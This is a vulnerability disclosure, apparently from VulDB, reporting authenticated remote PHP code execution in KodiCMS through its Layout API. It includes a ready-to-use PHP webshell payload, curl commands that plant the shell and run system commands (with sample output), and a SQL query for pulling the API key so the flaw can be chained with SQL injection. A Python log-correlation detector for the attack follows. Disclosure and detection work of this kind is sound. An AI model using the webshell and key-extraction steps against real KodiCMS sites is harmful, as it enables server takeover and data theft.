Submission #718290: KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 Code Injection Info

Title: KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 Code Injection
Description:

# Arbitrary PHP Code Execution via Layout API in KodiCMS

**BUG_Author:** Security Researcher
**Affected Version:** KodiCMS ≤ 13.82.135 (all versions)
**Vendor:** [KodiCMS-Kohana GitHub Repository](https://github.com/KodiCMS-Kohana/cms)
**Software:** [KodiCMS](https://github.com/KodiCMS-Kohana/cms)
**Vulnerability Files:**
- `cms/modules/kodicms/classes/kodicms/model/file.php`
- `cms/modules/kodicms/classes/kodicms/controller/api/layout.php`

## Description:

1. **Arbitrary PHP Code Execution via Layout API:**
   - In the file `cms/modules/kodicms/classes/kodicms/model/file.php`, the `save()` function uses `file_put_contents()` to write user-controlled content directly to PHP files without any sanitization.
   - The Layout API endpoint allows authenticated users to create or modify layout files with arbitrary PHP code.
2. **Exploiting the Vulnerability:**
   - By sending a crafted PUT request to the Layout API endpoint with malicious PHP code in the `content` parameter, an attacker can create a webshell on the server.
   - The created PHP file is stored in the `/layouts/` directory, which is publicly accessible via web browser.
3. **Example Webshell Payload:**
   - The following payload can be used to create a webshell:
   ```
   <?php echo 'PWNED';system($_GET['c']);?>
   ```
4. **Requesting the Layout API Endpoint:**
   - Make a PUT request to the Layout API endpoint with the webshell payload:
   ```
   PUT /backend/api-layout?api_key=<API_KEY>&name=shell&content=<URL_ENCODED_PAYLOAD>
   ```
5. **Verifying the Exploit:**
   - If the injection is successful, the webshell will be accessible at `/layouts/shell.php` and can execute arbitrary system commands.

## Prerequisites:

**API Key Acquisition:** The API key can be obtained through the following methods:

1. **Database Access:** If an attacker has database access (e.g., via SQL injection), the API key can be extracted from the `config` table:
   ```sql
   SELECT config_value FROM config WHERE group_name='api' AND config_key='key';
   ```
2. **Admin Panel Access:** Administrators can view the API key in the backend settings panel under API configuration.
3. **Configuration File:** The API key is stored in serialized format in the database and may be cached in configuration files.

**Note:** This vulnerability requires a valid API key or authenticated admin session. However, when combined with the SQL Injection vulnerability (CVE pending), an attacker can first extract the API key from the database and then use it to exploit this vulnerability for Remote Code Execution.

## Proof of Concept:

1. Create a webshell using the Layout API:
   ```bash
   curl -s -X PUT "http://<target-ip>/backend/api-layout?api_key=<API_KEY>&name=shell&content=%3C%3Fphp%20echo%20%27PWNED%27%3Bsystem%28%24_GET%5B%27c%27%5D%29%3B%3F%3E"
   ```
2. Verify the webshell was created:
   ```bash
   curl "http://<target-ip>/layouts/shell.php"
   ```
3. Execute arbitrary commands on the server:
   ```bash
   curl "http://<target-ip>/layouts/shell.php?c=id"
   ```
4. Expected output:
   ```
   PWNEDuid=33(www-data) gid=33(www-data) groups=33(www-data)
   ```

## Vulnerable Code:

**File:** `cms/modules/kodicms/classes/kodicms/model/file.php` (Line 437)

```php
public function save()
{
    // ... validation code ...
    return file_put_contents($this->_file, $this->_content) !== FALSE;
}
```

**File:** `cms/modules/kodicms/classes/kodicms/controller/api/layout.php` (Line 53-73)

```php
public function rest_put()
{
    $layout = new Model_File_Layout($this->param('name', NULL, TRUE));
    $layout->content = $this->param('content', NULL); // User input directly assigned
    $status = $layout->save();                         // Writes to PHP file without sanitization
    // ...
}
```
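The report describes a two-step access pattern: a layout write through `/backend/api-layout` whose `content` parameter carries a PHP open tag, followed by a direct request to the resulting `/layouts/<name>.php`. The detection logic below, added here as an example that is not part of the submission or of the KodiCMS code base, correlates those two steps over web-server access logs. The log lines are constructed for the example (combined log format, redacted API key), and the `/backend/api-layout` and `/layouts/` paths are taken from the report as written.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Dec/2025:03:26:01 +0000] "PUT /backend/api-layout?api_key=REDACTED&name=shell&content=%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 200 45
10.0.0.5 - - [18/Dec/2025:03:26:07 +0000] "GET /layouts/shell.php?c=id HTTP/1.1" 200 78
10.0.0.9 - - [18/Dec/2025:03:30:00 +0000] "GET /backend/api-layout?api_key=REDACTED&name=main HTTP/1.1" 200 1203
10.0.0.7 - - [18/Dec/2025:03:31:00 +0000] "PUT /backend/api-layout?api_key=REDACTED&name=sidebar&content=%3Cdiv%3Ehello%3C%2Fdiv%3E HTTP/1.1" 200 45
"""

# Endpoint and directory named in the report (assumed to be served at these paths).
LAYOUT_API = "/backend/api-layout"
LAYOUT_DIR = "/layouts/"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any PHP open tag (<?php, <?=, or the short form <?) in a layout body.
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into ip/ts/method/path/query/status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    parts = urlsplit(event["target"])
    event["path"] = parts.path
    event["query"] = parse_qs(parts.query)  # percent-decodes parameter values
    return event


def analyze(log_text):
    """Return findings for layout writes carrying PHP and for direct reads of written layouts."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    findings = []
    written = {}  # layout name -> the write event that created/modified it

    for e in events:
        if (e["path"] == LAYOUT_API and e["method"] in ("PUT", "POST")
                and "content" in e["query"]):
            name = e["query"].get("name", [""])[0]
            content = e["query"]["content"][0]
            written[name] = e
            if PHP_TAG_RE.search(content):
                findings.append({"severity": "high", "ip": e["ip"], "ts": e["ts"],
                                 "layout": name,
                                 "reason": "layout write via API contains a PHP open tag"})
        elif (e["method"] == "GET" and e["path"].startswith(LAYOUT_DIR)
              and e["path"].endswith(".php")):
            name = e["path"][len(LAYOUT_DIR):-len(".php")]
            if name in written:
                findings.append({"severity": "critical", "ip": e["ip"], "ts": e["ts"],
                                 "layout": name,
                                 "reason": "direct request to a layout file written earlier "
                                           "through the API (written by %s)" % written[name]["ip"]})
            else:
                findings.append({"severity": "medium", "ip": e["ip"], "ts": e["ts"],
                                 "layout": name,
                                 "reason": "direct request to a layout file"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print("%-8s %s layout=%s from %s: %s" % (f["severity"].upper(), f["ts"],
                                                  f["layout"], f["ip"], f["reason"]))
```

Layouts in this product are PHP templates, so a PHP tag in a write is not proof of abuse on its own; the high-confidence signal is the direct request to `/layouts/<name>.php` after an API write, which is why the two events are correlated by layout name rather than alerted on separately. Running the block on the constructed lines reports the `shell` write as high and the follow-up request as critical, and ignores the HTML-only `sidebar` write.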
User: hiro (UID 93548)
Submitted: December 18, 2025 03:26 (6 months ago)
Moderation: December 31, 2025 10:17 (13 days later)
Status: Accepted
VulDB Entry: 339162 [Kohana KodiCMS up to 13.82.135 Layout API Endpoint file.php save content privilege escalation]
Points: 17
